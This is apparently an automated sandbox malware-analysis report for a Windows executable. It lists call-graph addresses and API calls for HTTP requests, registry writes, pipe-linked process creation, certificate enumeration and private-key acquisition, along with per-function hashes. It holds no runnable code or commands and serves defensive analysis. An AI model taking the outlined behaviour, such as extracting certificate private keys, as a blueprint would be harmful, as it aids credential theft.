7ff7cbca1990 4 API calls 4155->4156 4157 7ff7cbca9813 4156->4157 4157->4157 4158 7ff7cbca1990 4 API calls 4157->4158 4159 7ff7cbca9877 4158->4159 4251 7ff7cbca79f0 4159->4251 4163 7ff7cbca988d 4164 7ff7cbca25b4 GetProcessHeap RtlFreeHeap 4163->4164 4165 7ff7cbca9895 4164->4165 4166 7ff7cbca1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4165->4166 4167 7ff7cbca98a4 4166->4167 4168 7ff7cbca9224 15 API calls 4167->4168 4169 7ff7cbca98af 4168->4169 4170 7ff7cbcae6dc GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4169->4170 4171 7ff7cbca98cd 4170->4171 4172 7ff7cbcae6dc GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4171->4172 4173 7ff7cbca98ed 4172->4173 4174 7ff7cbca99cf 4173->4174 4175 7ff7cbca1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4173->4175 4176 7ff7cbca1a70 wvsprintfW GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4174->4176 4177 7ff7cbca993f 4175->4177 4178 7ff7cbca99ef 4176->4178 4179 7ff7cbca9950 4177->4179 4180 7ff7cbca9943 4177->4180 4181 7ff7cbca1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4178->4181 4182 7ff7cbca79f0 GetProcessHeap HeapAlloc 4179->4182 4183 7ff7cbca19e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4180->4183 4184 7ff7cbca99fe 4181->4184 4185 7ff7cbca9958 4182->4185 4186 7ff7cbca994e 4183->4186 4184->3986 4184->3993 4187 7ff7cbca19e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4185->4187 4189 7ff7cbca1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4186->4189 4188 7ff7cbca9966 4187->4188 4190 7ff7cbca25b4 GetProcessHeap RtlFreeHeap 4188->4190 4191 7ff7cbca997d 4189->4191 4190->4186 4192 7ff7cbca1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4191->4192 4193 7ff7cbca9991 4192->4193 4194 7ff7cbca99a2 4193->4194 4195 7ff7cbca9995 4193->4195 4196 7ff7cbca79f0 GetProcessHeap HeapAlloc 4194->4196 4197 7ff7cbca19e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4195->4197 4198 7ff7cbca99aa 4196->4198 4199 7ff7cbca99a0 4197->4199 4200 7ff7cbca19e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4198->4200 4202 7ff7cbca1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4199->4202 4201 7ff7cbca99b8 4200->4201 4203 7ff7cbca25b4 GetProcessHeap RtlFreeHeap 4201->4203 4202->4174 4203->4199 4266 7ff7cbca971c 4204->4266 4207 7ff7cbca94cf 4208 7ff7cbca94fc WaitForSingleObject 4207->4208 4209 7ff7cbca968c 6 API calls 4207->4209 4212 7ff7cbca9540 4207->4212 4218 7ff7cbca9534 TerminateProcess 4207->4218 4210 7ff7cbca9512 GetSystemTimeAsFileTime 4208->4210 4211 7ff7cbca954d 4208->4211 4209->4207 4210->4207 4211->4212 4213 7ff7cbca9563 4211->4213 4214 7ff7cbca968c 6 API calls 4211->4214 4212->3986 4213->4212 4215 7ff7cbca957d GetExitCodeProcess 4213->4215 4216 7ff7cbca968c 6 API calls 4213->4216 4214->4213 4215->4212 4217 7ff7cbca958f CloseHandle 4215->4217 4219 7ff7cbca9579 4216->4219 4217->4212 4218->4212 4219->4212 4219->4215 4223 7ff7cbca25dc GetProcessHeap HeapAlloc 4220->4223 4222 7ff7cbca965f 4222->4118 4225 7ff7cbca2561 CreatePipe 4224->4225 4225->4123 4225->4127 4227 7ff7cbca7d0e 4226->4227 4236 7ff7cbca25dc GetProcessHeap HeapAlloc 4227->4236 4229 7ff7cbca7d1d 4229->4139 4231 7ff7cbca25da 4230->4231 4232 7ff7cbca25b9 GetProcessHeap RtlFreeHeap 4230->4232 4231->4141 4232->4231 4234 7ff7cbca1918 4 API calls 4233->4234 4235 7ff7cbca1a96 wvsprintfW 4234->4235 4235->4138 4238 7ff7cbca96c2 4237->4238 4243 7ff7cbca96ca 4237->4243 4238->4243 4244 7ff7cbcae6dc 4238->4244 4241 7ff7cbca9701 4248 7ff7cbcae72c 4241->4248 4243->4151 4245 7ff7cbcae6f9 4244->4245 4246 7ff7cbca96dc ReadFile 4244->4246 4245->4245 4247 7ff7cbca2654 4 API calls 4245->4247 4246->4241 4246->4243 4247->4246 4249 7ff7cbcae6dc 4 API calls 4248->4249 4250 7ff7cbcae741 4249->4250 4250->4243 4252 7ff7cbca7a0d 4251->4252 4254 7ff7cbca7a09 4251->4254 4260 7ff7cbca25dc GetProcessHeap HeapAlloc 4252->4260 4255 7ff7cbca19e4 4254->4255 4261 7ff7cbca7dc8 4255->4261 4262 7ff7cbca7de9 4261->4262 4265 7ff7cbca25dc GetProcessHeap HeapAlloc 4262->4265 4269 7ff7cbca974b 4266->4269 4268 7ff7cbca94ba GetSystemTimeAsFileTime 4268->4207 4269->4268 4270 7ff7cbca97a4 WriteFile 4269->4270 4271 7ff7cbca97c7 4270->4271 4271->4269 4764 7ff7cbcaec08 4765 7ff7cbcaec33 4764->4765 4766 7ff7cbcaec1f 4764->4766 4770 7ff7cbca25dc GetProcessHeap HeapAlloc 4766->4770 4771 7ff7cbca250c 4776 7ff7cbca213c 4771->4776 4774 7ff7cbca253b 4819 7ff7cbca1c80 4776->4819 4779 7ff7cbca25b4 2 API calls 4780 7ff7cbca219e 4779->4780 4781 7ff7cbca24e6 4780->4781 4782 7ff7cbca21ba WinHttpCrackUrl 4780->4782 4781->4774 4808 7ff7cbca1eec 4781->4808 4783 7ff7cbca21e6 4782->4783 4784 7ff7cbca24dd WinHttpCloseHandle 4782->4784 4785 7ff7cbca21f7 WinHttpConnect 4783->4785 4784->4781 4785->4784 4786 7ff7cbca2225 4785->4786 4786->4786 4787 7ff7cbca228b WinHttpOpenRequest 4786->4787 4788 7ff7cbca22ba 4787->4788 4789 7ff7cbca24cd WinHttpCloseHandle 4787->4789 4790 7ff7cbca22c0 WinHttpQueryOption WinHttpSetOption 4788->4790 4791 7ff7cbca2304 WinHttpSendRequest 4788->4791 4789->4784 4790->4791 4792 7ff7cbca24c4 WinHttpCloseHandle 4791->4792 4793 7ff7cbca232b WinHttpReceiveResponse 4791->4793 4792->4789 4793->4792 4794 7ff7cbca233e 4793->4794 4795 7ff7cbcae7cc 2 API calls 4794->4795 4796 7ff7cbca234d WinHttpQueryDataAvailable 4795->4796 4797 7ff7cbcae6dc 4 API calls 4796->4797 4798 7ff7cbca236d WinHttpReadData 4797->4798 4799 7ff7cbca238b 4798->4799 4799->4796 4800 7ff7cbcae72c 4 API calls 4799->4800 4802 7ff7cbca239f 4799->4802 4800->4799 4801 7ff7cbca24ba 4801->4792 4802->4801 4823 7ff7cbca7a60 4802->4823 4847 7ff7cbca1de8 4808->4847 4811 7ff7cbca2121 4811->4774 4812 7ff7cbca1f5e SysAllocString SafeArrayCreateVector SafeArrayAccessData 4813 7ff7cbca262c 4812->4813 4814 7ff7cbca1fa8 SafeArrayUnaccessData 4813->4814 4817 7ff7cbca1fd9 4814->4817 4815 7ff7cbca1ffe SysFreeString 4815->4811 4817->4815 4818 7ff7cbca1cbc 11 API calls 4817->4818 4818->4815 4820 7ff7cbca1ca1 4819->4820 4821 7ff7cbca1ca5 WinHttpOpen 4820->4821 4822 7ff7cbca79f0 2 API calls 4820->4822 4821->4779 4822->4821 4824 7ff7cbca24a5 4823->4824 4825 7ff7cbca7a84 4823->4825 4827 7ff7cbca1cbc 4824->4827 4835 7ff7cbca25dc GetProcessHeap HeapAlloc 4825->4835 4836 7ff7cbcaa520 4827->4836 4837 7ff7cbcaa551 4836->4837 4837->4837 4846 7ff7cbca25dc GetProcessHeap HeapAlloc 4837->4846 4853 7ff7cbca1b74 4847->4853 4849 7ff7cbca1e06 RegCreateKeyExA 4850 7ff7cbca1e3f CoInitializeEx VariantInit CoCreateInstance 4849->4850 4851 7ff7cbca1e46 4849->4851 4850->4811 4850->4812 4851->4851 4852 7ff7cbca1ea2 RegSetValueExA RegCloseKey 4851->4852 4852->4850 4854 7ff7cbca1bc3 4853->4854 4854->4849 4855 7ff7cbcadc0c 4856 7ff7cbcadc60 4855->4856 4857 7ff7cbca1990 4 API calls 4856->4857 4858 7ff7cbcadc96 4857->4858 4859 7ff7cbca1990 4 API calls 4858->4859 4860 7ff7cbcadcad 4859->4860 4983 7ff7cbcacbf4 RegOpenKeyExW 4860->4983 4862 7ff7cbcadccd 4863 7ff7cbca1990 4 API calls 4862->4863 4864 7ff7cbcadd30 4863->4864 4865 7ff7cbca1990 4 API calls 4864->4865 4866 7ff7cbcadd47 4865->4866 4867 7ff7cbcaccf8 6 API calls 4866->4867 4868 7ff7cbcadd6c 4867->4868 4869 7ff7cbcadeb3 4868->4869 4871 7ff7cbcadd80 PathCombineW PathFileExistsW 4868->4871 4870 7ff7cbca1990 4 API calls 4869->4870 4872 7ff7cbcadec2 4870->4872 4873 7ff7cbcadda6 PathQuoteSpacesW 4871->4873 4874 7ff7cbcadea0 4871->4874 4878 7ff7cbca1990 4 API calls 4872->4878 4989 7ff7cbcacff0 4873->4989 4875 7ff7cbca25b4 2 API calls 4874->4875 4875->4869 4877 7ff7cbcaddbc lstrcatW 4991 7ff7cbcae8a4 4877->4991 4880 7ff7cbcaded9 4878->4880 4882 7ff7cbcacbf4 4 API calls 4880->4882 4884 7ff7cbcadef2 4882->4884 4883 7ff7cbca9644 2 API calls 4886 7ff7cbcadde6 4883->4886 4885 7ff7cbca1990 4 API calls 4884->4885 4887 7ff7cbcadf0e 4885->4887 4886->4886 4889 7ff7cbca900c 16 API calls 4886->4889 4888 7ff7cbca1990 4 API calls 4887->4888 4890 7ff7cbcadf1d 4888->4890 4891 7ff7cbcade3b 4889->4891 4893 7ff7cbca1990 4 API calls 4890->4893 4892 7ff7cbca95a0 8 API calls 4891->4892 4896 7ff7cbcade81 4891->4896 4894 7ff7cbcade50 4892->4894 4895 7ff7cbcadf34 4893->4895 4897 7ff7cbcade77 4894->4897 4898 7ff7cbca97dc 16 API calls 4894->4898 4899 7ff7cbcadf40 GetEnvironmentVariableW 4895->4899 4901 7ff7cbca25b4 2 API calls 4896->4901 4900 7ff7cbca9478 13 API calls 4897->4900 4902 7ff7cbcade64 4898->4902 4903 7ff7cbcadf69 4899->4903 4904 7ff7cbcae1e7 4899->4904 4900->4896 4901->4874 4902->4897 4907 7ff7cbca1990 4 API calls 4902->4907 4908 7ff7cbcadf75 PathAppendW PathFileExistsW 4903->4908 4905 7ff7cbca1990 4 API calls 4904->4905 4906 7ff7cbcae1f6 4905->4906 4912 7ff7cbca1990 4 API calls 4906->4912 4907->4897 4908->4904 4909 7ff7cbcadf9a CreateFileW 4908->4909 4909->4904 4910 7ff7cbcadfcf GetFileSize 4909->4910 4998 7ff7cbca25dc GetProcessHeap HeapAlloc 4910->4998 4914 7ff7cbcae20d 4912->4914 4917 7ff7cbcacbf4 4 API calls 4914->4917 4919 7ff7cbcae22a 4917->4919 4922 7ff7cbca1990 4 API calls 4919->4922 4924 7ff7cbcae246 4922->4924 4926 7ff7cbca1990 4 API calls 4924->4926 4928 7ff7cbcae25d 4926->4928 4932 7ff7cbcae269 GetEnvironmentVariableW 4928->4932 4933 7ff7cbcae37c 4932->4933 4934 7ff7cbcae28c 4932->4934 4936 7ff7cbca1990 4 API calls 4933->4936 4938 7ff7cbcae298 PathAppendW PathFileExistsW 4934->4938 4939 7ff7cbcae38b 4936->4939 4938->4933 4942 7ff7cbcae2bd CreateFileW 4938->4942 4943 7ff7cbca1990 4 API calls 4939->4943 4942->4933 4947 7ff7cbcae2f2 GetFileSize 4942->4947 4948 7ff7cbcae39a 4943->4948 4999 7ff7cbca2588 GetProcessHeap HeapAlloc 4947->4999 4984 7ff7cbcaccd7 4983->4984 4985 7ff7cbcacc47 RegEnumKeyExW 4983->4985 4984->4862 4986 7ff7cbcacc7d RegEnumKeyExW 4985->4986 4987 7ff7cbcacccc RegCloseKey 4985->4987 4986->4987 4987->4984 4990 7ff7cbcad04b 4989->4990 4990->4877 4992 7ff7cbcae7cc 2 API calls 4991->4992 4993 7ff7cbcae8c3 4992->4993 5000 7ff7cbcae750 4993->5000 4996 7ff7cbcae6dc 4 API calls 4997 7ff7cbcaddd9 4996->4997 4997->4883 5001 7ff7cbcae797 5000->5001 5002 7ff7cbcae76b 5000->5002 5001->4996 5002->5001 5003 7ff7cbcae6dc 4 API calls 5002->5003 5003->5002 3952 7ff7cbca31c4 3953 7ff7cbca31d7 3952->3953 3960 7ff7cbca1990 3953->3960 3955 7ff7cbca31e2 3956 7ff7cbca1990 4 API calls 3955->3956 3957 7ff7cbca31f1 CertEnumSystemStoreLocation 3956->3957 3958 7ff7cbca1990 4 API calls 3957->3958 3959 7ff7cbca3215 3958->3959 3961 7ff7cbca19ad 3960->3961 3964 7ff7cbca1918 3961->3964 3963 7ff7cbca19ba 3963->3955 3965 7ff7cbca1951 3964->3965 3966 7ff7cbca192e 3964->3966 3965->3963 3966->3966 3968 7ff7cbca2654 3966->3968 3969 7ff7cbca2682 3968->3969 3970 7ff7cbca2669 GetProcessHeap RtlReAllocateHeap 3968->3970 3973 7ff7cbca25dc GetProcessHeap HeapAlloc 3969->3973 3971 7ff7cbca268a 3970->3971 3971->3965 5004 7ff7cbcae604 lstrcpyW PathAppendW 5005 7ff7cbcae644 5004->5005 5006 7ff7cbcaccf8 6 API calls 5005->5006 5008 7ff7cbcae660 5006->5008 5007 7ff7cbcae6cb 5008->5007 5009 7ff7cbca1990 4 API calls 5008->5009 5010 7ff7cbcae67c 5009->5010 5011 7ff7cbca19e4 4 API calls 5010->5011 5012 7ff7cbcae687 5011->5012 5013 7ff7cbca1990 4 API calls 5012->5013 5014 7ff7cbcae69f 5013->5014 5015 7ff7cbca19e4 4 API calls 5014->5015 5016 7ff7cbcae6af 5015->5016 5017 7ff7cbca1990 4 API calls 5016->5017 5018 7ff7cbcae6be 5017->5018 5019 7ff7cbca25b4 2 API calls 5018->5019 5019->5007 5020 7ff7cbca61f8 5021 7ff7cbca620e 5020->5021 5022 7ff7cbca7234 5 API calls 5021->5022 5023 7ff7cbca623c 5022->5023 5024 7ff7cbca7234 5 API calls 5023->5024 5025 7ff7cbca625c 5024->5025 4378 7ff7cbca73fc 4379 7ff7cbca743f 4378->4379 4380 7ff7cbca1990 4 API calls 4379->4380 4381 7ff7cbca746e 4380->4381 4382 7ff7cbca1a70 5 API calls 4381->4382 4383 7ff7cbca7490 4382->4383 4384 7ff7cbca1a70 5 API calls 4383->4384 4385 7ff7cbca74a4 4384->4385 4426 7ff7cbca78ec 4385->4426 4388 7ff7cbca1990 4 API calls 4389 7ff7cbca74c5 4388->4389 4390 7ff7cbca1a70 5 API calls 4389->4390 4391 7ff7cbca74d9 4390->4391 4432 7ff7cbca79c4 GetNativeSystemInfo 4391->4432 4394 7ff7cbca1990 4 API calls 4395 7ff7cbca74fa 4394->4395 4434 7ff7cbca7138 CoInitializeEx CoInitializeSecurity CoCreateInstance 4395->4434 4397 7ff7cbca7503 4402 7ff7cbca75d1 4397->4402 4435 7ff7cbca785c 4397->4435 4398 7ff7cbca783c 4446 7ff7cbca7104 4398->4446 4402->4398 4403 7ff7cbca785c 5 API calls 4402->4403 4406 7ff7cbca7629 4403->4406 4404 7ff7cbca755b 4405 7ff7cbca785c 5 API calls 4404->4405 4408 7ff7cbca7596 4405->4408 4407 7ff7cbca785c 5 API calls 4406->4407 4410 7ff7cbca7664 4407->4410 4409 7ff7cbca785c 5 API calls 4408->4409 4409->4402 4411 7ff7cbca785c 5 API calls 4410->4411 4412 7ff7cbca769f 4411->4412 4413 7ff7cbca785c 5 API calls 4412->4413 4414 7ff7cbca76da 4413->4414 4415 7ff7cbca785c 5 API calls 4414->4415 4416 7ff7cbca7715 4415->4416 4417 7ff7cbca785c 5 API calls 4416->4417 4418 7ff7cbca7750 4417->4418 4419 7ff7cbca785c 5 API calls 4418->4419 4420 7ff7cbca778b 4419->4420 4421 7ff7cbca785c 5 API calls 4420->4421 4422 7ff7cbca77c6 4421->4422 4423 7ff7cbca785c 5 API calls 4422->4423 4424 7ff7cbca7801 4423->4424 4425 7ff7cbca785c 5 API calls 4424->4425 4425->4398 4427 7ff7cbca7918 4426->4427 4427->4427 4428 7ff7cbca7977 LoadLibraryA GetProcAddress 4427->4428 4429 7ff7cbca7991 GetCurrentProcess IsWow64Process 4428->4429 4431 7ff7cbca74a9 4428->4431 4430 7ff7cbca79ad 4429->4430 4429->4431 4430->4431 4431->4388 4433 7ff7cbca74de 4432->4433 4433->4394 4434->4397 4436 7ff7cbca1990 4 API calls 4435->4436 4437 7ff7cbca7888 4436->4437 4438 7ff7cbca1990 4 API calls 4437->4438 4439 7ff7cbca7893 4438->4439 4440 7ff7cbca1990 4 API calls 4439->4440 4441 7ff7cbca78a2 4440->4441 4449 7ff7cbca7034 4441->4449 4444 7ff7cbca1990 4 API calls 4445 7ff7cbca78d5 4444->4445 4445->4404 4447 7ff7cbca7116 CoUninitialize 4446->4447 4451 7ff7cbca7079 4449->4451 4450 7ff7cbca707d 4450->4444 4451->4450 4453 7ff7cbca6004 4451->4453 4454 7ff7cbca601a 4453->4454 4457 7ff7cbca7234 4454->4457 4466 7ff7cbca7310 4457->4466 4460 7ff7cbca6042 4461 7ff7cbca7260 4464 7ff7cbca1990 4 API calls 4461->4464 4462 7ff7cbca1990 4 API calls 4463 7ff7cbca7275 4462->4463 4465 7ff7cbca19e4 4 API calls 4463->4465 4464->4460 4465->4461 4467 7ff7cbca733e 4466->4467 4468 7ff7cbca7381 4467->4468 4470 7ff7cbca7362 4467->4470 4469 7ff7cbca73bb 4468->4469 4471 7ff7cbca7395 4468->4471 4472 7ff7cbca1990 4 API calls 4469->4472 4474 7ff7cbca1a70 5 API calls 4470->4474 4477 7ff7cbca1a70 5 API calls 4471->4477 4473 7ff7cbca73ca 4472->4473 4475 7ff7cbca1990 4 API calls 4473->4475 4476 7ff7cbca7251 4474->4476 4478 7ff7cbca73d5 4475->4478 4476->4460 4476->4461 4476->4462 4477->4476 4479 7ff7cbca1990 4 API calls 4478->4479 4479->4476 5026 7ff7cbcaecbc 5027 7ff7cbcaee07 5026->5027 5028 7ff7cbcaecea 5026->5028 5028->5027 5040 7ff7cbca25dc GetProcessHeap HeapAlloc 5028->5040 5041 7ff7cbcac37c 5042 7ff7cbcac38f 5041->5042 5043 7ff7cbca1990 4 API calls 5042->5043 5044 7ff7cbcac39a 5043->5044 5059 7ff7cbcac548 5044->5059 5143 7ff7cbcae944 5059->5143 5164 7ff7cbca25dc GetProcessHeap HeapAlloc 5143->5164

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FF7CBCA7138 Relevance: 4.5, APIs: 3, Instructions: 38comCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize$CreateInstanceSecurity
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 89549506-0
                                                                                                                            • Opcode ID: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
                                                                                                                            • Instruction ID: 29fb2367b9cdde2808705716e87e1773e5cf23658b3fe62767f5f4b70631e0dc
                                                                                                                            • Opcode Fuzzy Hash: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
                                                                                                                            • Instruction Fuzzy Hash: 5D118C73A24640CAF3209F61E8593AE7774F34870DF608218EB491A958CF3CD245CB94
                                                                                                                            Function 00007FF7CBCA2654 Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(?,?,?,00007FF7CBCA1951,?,?,00000000,00007FF7CBCA19BA), ref: 00007FF7CBCA2669
                                                                                                                            • RtlReAllocateHeap.NTDLL(?,?,?,00007FF7CBCA1951,?,?,00000000,00007FF7CBCA19BA), ref: 00007FF7CBCA267A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1357844191-0
                                                                                                                            • Opcode ID: be938404752c85019b6f44b0f5e5ed4010620d834be4c87ef3aa5fcdd3d15046
                                                                                                                            • Instruction ID: c157f1cc4890f256802a5b5615d5210543fd8802ee67f6507f9beb974e2fed63
                                                                                                                            • Opcode Fuzzy Hash: be938404752c85019b6f44b0f5e5ed4010620d834be4c87ef3aa5fcdd3d15046
                                                                                                                            • Instruction Fuzzy Hash: 79E08615A195A281E928AF9AB954079A135AF48FE0F888430FF0E0B775CE2CD5414610
                                                                                                                            Function 00007FF7CBCA2D5C Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 253encryptiontimeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CertEnumCertificatesInStore.CRYPT32 ref: 00007FF7CBCA2D90
                                                                                                                            • CertGetNameStringW.CRYPT32 ref: 00007FF7CBCA2DD3
                                                                                                                            • CertNameToStrW.CRYPT32 ref: 00007FF7CBCA2EB8
                                                                                                                            • CertNameToStrW.CRYPT32 ref: 00007FF7CBCA2F0A
                                                                                                                            • FileTimeToSystemTime.KERNEL32 ref: 00007FF7CBCA2F4B
                                                                                                                            • FileTimeToSystemTime.KERNEL32 ref: 00007FF7CBCA2FC1
                                                                                                                              • Part of subcall function 00007FF7CBCA1A70: wvsprintfW.USER32 ref: 00007FF7CBCA1AA9
                                                                                                                              • Part of subcall function 00007FF7CBCA25B4: GetProcessHeap.KERNEL32 ref: 00007FF7CBCA25C1
                                                                                                                              • Part of subcall function 00007FF7CBCA25B4: RtlFreeHeap.NTDLL ref: 00007FF7CBCA25CF
                                                                                                                            • CertEnumCertificatesInStore.CRYPT32 ref: 00007FF7CBCA3178
                                                                                                                              • Part of subcall function 00007FF7CBCA3220: CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA325E
                                                                                                                              • Part of subcall function 00007FF7CBCA3220: CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF7CBCA328D
                                                                                                                              • Part of subcall function 00007FF7CBCA3220: CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA32BB
                                                                                                                              • Part of subcall function 00007FF7CBCA3220: LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA3336
                                                                                                                              • Part of subcall function 00007FF7CBCA3220: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA3380
                                                                                                                              • Part of subcall function 00007FF7CBCA3220: VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CBCA33AC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Cert$Time$Name$CertificateCertificatesCryptEnumFileHeapStoreSystem$AcquireAddressContextFreeLibraryLoadPrivateProcProcessPropertyProtectStringUserVirtualwvsprintf
                                                                                                                            • String ID: 1.2.840.113549
                                                                                                                            • API String ID: 2787208766-3888290641
                                                                                                                            • Opcode ID: 54ac73e7e283cc655eb01142bb5e8eae3fe0ba445d2b642dac4cf7936e5552d7
                                                                                                                            • Instruction ID: c9aa2769a68da4bdf34d406fa0729a2bf928d94c85eb105ea93ef6a4eb9bd55f
                                                                                                                            • Opcode Fuzzy Hash: 54ac73e7e283cc655eb01142bb5e8eae3fe0ba445d2b642dac4cf7936e5552d7
                                                                                                                            • Instruction Fuzzy Hash: 14B18F62A1866285EB60AF6AD4512BEA761FB85BD4F800431EF9D07B69DF3CD104CB60
                                                                                                                            Function 00007FF7CBCA900C Relevance: 13.6, APIs: 9, Instructions: 137pipeprocessCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateErrorLast$Pipe$CloseHandleProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2620922840-0
                                                                                                                            • Opcode ID: 2bf46aedc423b534a393a5c4b1443350d03c6c4fe38568a13f8f064401dd7188
                                                                                                                            • Instruction ID: 78e4cbc5e639e9c6d41149b44979b19229e93d5b01c940fd0eddf9693a211396
                                                                                                                            • Opcode Fuzzy Hash: 2bf46aedc423b534a393a5c4b1443350d03c6c4fe38568a13f8f064401dd7188
                                                                                                                            • Instruction Fuzzy Hash: 04518432B18A518AEB20EFB5D4843ED73A1AB58798F800435EF0D9BA69DF7CD109C350
                                                                                                                            Function 00007FF7CBCA9224 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 158synchronizationtimeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
